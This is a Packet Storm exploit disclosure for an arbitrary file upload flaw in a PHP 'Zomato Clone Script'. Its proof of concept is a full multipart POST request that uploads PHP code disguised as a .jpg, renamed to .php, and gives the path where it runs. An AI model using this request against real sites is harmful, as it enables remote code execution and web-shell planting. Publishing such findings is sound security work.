what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Zomato Clone Script Arbitrary File Upload

Zomato Clone Script Arbitrary File Upload
Posted Jan 17, 2018
Authored by Tauco

Zomato Clone Script suffers from a remote file upload vulnerability.

tags | exploit, remote, file upload
SHA-256 | f6204b1369e8f6a5880aeecfbf75a0badf377f4e425b88c8845232aa9a0cbe9c

Zomato Clone Script Arbitrary File Upload

Change Mirror Download
# # # # # 
# Zomato Clone - Arbitrary File Upload
# Date: 16.01.2018
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/099S4111872/php-scripts/zomato-clone-script
# Demo: http://jhinstitute.com/demo/foodpanda/
# Version: N/A
# Category: Webapps
# Tested on: Windows 10
# Exploit Author: Tauco

Testing for malicious files verifies that the application/system is able to correctly protect against attackers uploading malicious files. Vulnerabilities related to the uploading of malicious files is unique in that these amaliciousa files can easily be rejected through including business logic that will scan files during the upload process and reject those perceived as malicious. Additionally, this is different from uploading unexpected files in that while the file type may be accepted the file may still be malicious to the system.

Proof of concept:
===================================================================================
POST /demo/foodpanda/myacount.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate

-----------------------------41184676334
Content-Disposition: form-data; name="fname"

test
-----------------------------41184676334
Content-Disposition: form-data; name="lname"

test
-----------------------------41184676334
Content-Disposition: form-data; name="email"

test@test.com
-----------------------------41184676334
Content-Disposition: form-data; name="phone"

123
-----------------------------41184676334
Content-Disposition: form-data; name="image"; filename="info.php.jpg" (change extension to .php)
Content-Type: image/jpeg

<?php
phpinfo();
?>
-----------------------------41184676334
Content-Disposition: form-data; name="addr1"

test
-----------------------------41184676334
Content-Disposition: form-data; name="addr2"

test
-----------------------------41184676334
Content-Disposition: form-data; name="post"


-----------------------------41184676334
Content-Disposition: form-data; name="country"

1
-----------------------------41184676334
Content-Disposition: form-data; name="state"

3945
-----------------------------41184676334
Content-Disposition: form-data; name="city"

16315
-----------------------------41184676334
Content-Disposition: form-data; name="location"

test
-----------------------------41184676334
Content-Disposition: form-data; name="update"

Upload
-----------------------------41184676334--


===================================================================================

Open file location : /demo/foodpanda/photo/mid/[...php]


Description:
==========================================================


Request Method(s): [+] POST & GET


Vulnerable Product: [+] Zomato Clone Script


Vulnerable Parameter(s): [+] filename


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close